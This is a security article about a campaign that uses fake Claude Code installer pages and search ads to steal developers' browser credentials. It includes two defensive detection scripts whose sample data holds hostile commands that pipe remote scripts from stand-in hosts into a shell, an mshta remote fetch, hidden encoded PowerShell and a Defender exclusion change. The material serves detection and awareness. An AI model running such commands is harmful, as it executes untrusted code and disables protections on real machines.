Fake Claude Code Installers Used to Steal Developer Browser Credentials
Cybersecurity researchers uncovered an active malware campaign targeting software developers through fake installation pages impersonating Anthropic’s Claude Code platform. The operation relies heavily on social engineering and malicious search advertisements to trick victims into downloading or executing malware disguised as legitimate AI development tooling. The campaign demonstrates a growing trend where attackers exploit the popularity and rapid adoption of AI-assisted coding tools to compromise developer environments and steal sensitive browser data.
The attack typically begins when a developer searches online for terms such as “install Claude Code” or “Claude Code CLI.” Attackers purchase sponsored search advertisements that appear above legitimate results, redirecting victims to convincing lookalike websites that closely mimic official Claude documentation pages. These fake pages replicate branding, layouts, installation guides, and command-line instructions in order to appear authentic to technically experienced users.
A critical element of the campaign is the abuse of modern one-line installation workflows commonly used in developer tooling. Instead of downloading software traditionally, many modern AI and development utilities instruct users to run terminal commands that automatically fetch and execute scripts from remote servers. Attackers exploit this trust model by replacing legitimate installation commands with malicious alternatives that silently download malware payloads from attacker-controlled infrastructure. In several observed cases, the visible command differed subtly from the legitimate one, using deceptive domains that closely resembled official services.
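The trust model described above can be checked before anything is executed. The following Python script is an added illustration, not code from the original article or from the researchers it cites: it takes a pasted one-line install command, extracts the download URL, and flags two things a developer would want to know before running it, namely whether the command pipes remote content straight into a shell and whether the host is a lookalike of a trusted installer host (measured by edit distance). The allowlist entries and the lookalike hostnames are constructed placeholders, not Anthropic's real domains.

```python
import re
from urllib.parse import urlparse

# Hosts an organisation trusts to serve installer scripts.
# Constructed placeholder values for this example; replace with your own vetted list.
TRUSTED_INSTALL_HOSTS = {"install.example-vendor.test", "cdn.example-vendor.test"}

# First URL argument in a curl/wget/iwr style command (stops at whitespace, quotes, pipes).
URL_RE = re.compile(r"https?://[^\s'\"|;)]+")

# "| sh", "| sudo bash", "| iex", "| Invoke-Expression": remote content executed unseen.
PIPE_TO_SHELL_RE = re.compile(
    r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b|\|\s*iex\b|\|\s*Invoke-Expression\b",
    re.IGNORECASE,
)

# Maximum edit distance at which a host is treated as a lookalike of a trusted one (assumed tuning value).
LOOKALIKE_MAX_DISTANCE = 2


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance; small values between hostnames indicate typosquatting."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def analyze_install_command(cmd: str, trusted=TRUSTED_INSTALL_HOSTS) -> dict:
    """Return the URLs found, whether the command pipes into a shell, and a list of findings.

    An empty findings list means: no pipe-to-shell and every host is on the allowlist.
    """
    findings = []
    urls = URL_RE.findall(cmd)
    pipe_to_shell = PIPE_TO_SHELL_RE.search(cmd) is not None
    if pipe_to_shell:
        findings.append("pipes remote content directly into a shell; download and inspect first")
    for url in urls:
        host = urlparse(url).hostname or ""  # urlparse lowercases the host
        if host in trusted:
            continue
        closest = min(trusted, key=lambda t: levenshtein(host, t))
        distance = levenshtein(host, closest)
        if distance <= LOOKALIKE_MAX_DISTANCE:
            findings.append(
                f"host {host!r} is a lookalike of trusted {closest!r} (edit distance {distance})"
            )
        else:
            findings.append(f"host {host!r} is not on the allowlist")
    return {"urls": urls, "pipe_to_shell": pipe_to_shell, "findings": findings}


if __name__ == "__main__":
    # Constructed commands: one download-only from a trusted host, one typosquatted pipe-to-shell,
    # one PowerShell-style fetch from an unknown host.
    for command in (
        "curl -fsSL https://install.example-vendor.test/claude.sh -o claude.sh",
        "curl -fsSL https://install.exarnple-vendor.test/claude.sh | sh",
        "iwr -useb https://evil-cdn.test/setup.ps1 | iex",
    ):
        result = analyze_install_command(command)
        print(command)
        for finding in result["findings"] or ["no findings"]:
            print("  -", finding)
```

The download-only command from the allowlisted host produces no findings; the typosquatted command is flagged twice (pipe-to-shell and lookalike host); the unknown PowerShell host is flagged as off-allowlist. A check like this belongs in a pre-commit hook, a shell wrapper, or internal documentation tooling, and it complements rather than replaces reading the fetched script before running it.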
Once executed, the malicious scripts deploy heavily obfuscated PowerShell or shell-based loaders depending on the victim’s operating system. Researchers observed the malware specifically targeting Chromium-based browsers including Google Chrome, Microsoft Edge, Brave, Opera, Arc, Vivaldi, and other developer-focused browsers. The malware extracts encrypted browser keys, authentication tokens, saved passwords, session cookies, and in some cases stored payment information. This enables attackers to hijack active sessions and gain unauthorized access to cloud platforms, developer tools, and enterprise environments without needing the victim’s password directly.
The campaign also demonstrates advanced operational security techniques. Some malware variants check system region settings and avoid execution in specific countries, likely to evade local law enforcement attention or security researchers. Others use DLL sideloading techniques involving legitimately signed executables to make malicious activity appear trusted to endpoint security tools. Cleanup scripts are also deployed to delete traces of the initial installer, leaving only the persistent malware components active on the system.
Researchers identified multiple malware families associated with the campaign, including credential stealers, remote access backdoors, and infostealers targeting both Windows and macOS systems. Some variants also manipulate Windows Defender exclusions or leverage tools such as mshta.exe and PowerShell to evade detection. On macOS systems, attackers used obfuscated shell commands and osascript execution chains to deploy malware payloads while appearing as legitimate setup instructions.
The impact of this campaign is particularly severe because developer systems represent high-value targets within organizations. Compromising a developer workstation can provide attackers with access to source code repositories, cloud credentials, API tokens, CI/CD pipelines, and internal infrastructure. Stolen browser sessions may also bypass multi-factor authentication protections if active authentication tokens are captured successfully. As a result, a single compromised workstation can potentially lead to broader supply chain or enterprise compromise.
The campaign highlights how attackers are increasingly targeting trust relationships rather than exploiting technical vulnerabilities alone. Instead of breaking into systems directly, threat actors manipulate normal developer behavior and exploit the trust placed in installation commands, sponsored search results, and popular AI platforms. This approach is highly effective because it blends naturally into common development workflows and appears legitimate even to technically skilled users.
Organizations are advised to educate developers about the risks associated with copy-paste installation commands and sponsored search results. Security teams should implement browser session monitoring, restrict execution of unsigned scripts where possible, and monitor for suspicious process chains involving developer tools launching PowerShell or scripting engines. Additional protections include DNS filtering for newly registered domains, endpoint detection capable of identifying infostealer behavior, and isolation of development environments handling sensitive credentials.
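The process-chain monitoring recommended above, together with the mshta.exe, PowerShell and Defender-exclusion behaviours mentioned earlier, can be expressed as a small set of weighted rules. The following Python script is an added example and not code from the original article: it scores constructed process-creation events (parent image, child image, command line, in the shape a Sysmon or EDR feed would provide) and raises an alert only when the accumulated score crosses a threshold, so a developer terminal legitimately launching pwsh stays below the line while a hidden, encoded PowerShell spawned from an editor does not. The rule weights, threshold and the parent/child name sets are assumptions to tune per environment.

```python
import re
from pathlib import PureWindowsPath

# Parents that are developer tools or terminals (assumed set; extend for your fleet).
DEV_TOOL_PARENTS = {"code.exe", "windowsterminal.exe", "node.exe", "git.exe", "idea64.exe"}
# Scripting engines a developer tool rarely needs to spawn with evasion flags.
SCRIPT_ENGINES = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# PowerShell flags commonly seen in loaders: encoded command, hidden window, no profile, policy bypass.
PS_EVASION_RE = re.compile(
    r"(?:^|\s)-e(?:nc(?:odedcommand)?)?\s|-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|"
    r"-ep\s+bypass|-executionpolicy\s+bypass",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(path).name.lower()


# (rule name, weight, predicate over one event). Weights are assumed tuning values.
RULES = [
    ("dev_tool_spawns_script_engine", 1,
     lambda ev: basename(ev["parent"]) in DEV_TOOL_PARENTS and basename(ev["image"]) in SCRIPT_ENGINES),
    ("hidden_or_encoded_powershell", 2,
     lambda ev: basename(ev["image"]) in {"powershell.exe", "pwsh.exe"}
     and PS_EVASION_RE.search(ev["cmdline"]) is not None),
    ("mshta_remote_content", 3,
     lambda ev: basename(ev["image"]) == "mshta.exe"
     and re.search(r"https?://", ev["cmdline"], re.IGNORECASE) is not None),
    ("defender_exclusion_added", 3,
     lambda ev: re.search(r"Add-MpPreference\b.*-Exclusion(?:Path|Process|Extension)",
                          ev["cmdline"], re.IGNORECASE) is not None),
]
ALERT_THRESHOLD = 3  # assumed: a single high-confidence rule or a dev-tool chain plus evasion flags


def evaluate_event(ev: dict) -> tuple[int, list[str]]:
    """Total score and the names of the rules the event matched."""
    matched = [name for name, _, pred in RULES if pred(ev)]
    score = sum(weight for name, weight, _ in RULES if name in matched)
    return score, matched


def scan(events: list[dict]) -> list[dict]:
    """Return one alert per event whose score reaches ALERT_THRESHOLD."""
    alerts = []
    for ev in events:
        score, matched = evaluate_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append({"id": ev["id"], "score": score, "rules": matched, "cmdline": ev["cmdline"]})
    return alerts


# Constructed sample telemetry, not real captures. The base64 string is a meaningless placeholder.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QUJDRA=="},
    {"id": 2, "parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c npm run build"},
    {"id": 3, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://installer-lookalike.test/setup.hta"},
    {"id": 4, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Add-MpPreference -ExclusionPath C:\Users\dev\AppData\Local\Temp"},
    {"id": 5, "parent": r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe", "cmdline": r"pwsh.exe -File .\build.ps1"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"event {alert['id']} score={alert['score']} rules={alert['rules']}: {alert['cmdline']}")
```

On the constructed events, the editor-spawned hidden encoded PowerShell, the mshta.exe fetch of remote content and the Defender exclusion change each produce an alert, while the plain `npm run build` and the terminal running a local build script do not. The weighting is the point: a developer tool launching a script engine is a weak signal on its own and becomes actionable only in combination with evasion flags or a known-bad behaviour.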
In conclusion, the fake Claude Code installer campaign demonstrates a new generation of socially engineered attacks targeting developers through AI ecosystem trust. By abusing installation workflows, fake documentation pages, and developer curiosity around AI tooling, attackers are able to deploy sophisticated credential-stealing malware with minimal technical exploitation required. The incident reinforces the importance of zero-trust principles within developer workflows and highlights how rapidly emerging AI ecosystems are becoming prime targets for modern cybercrime operations.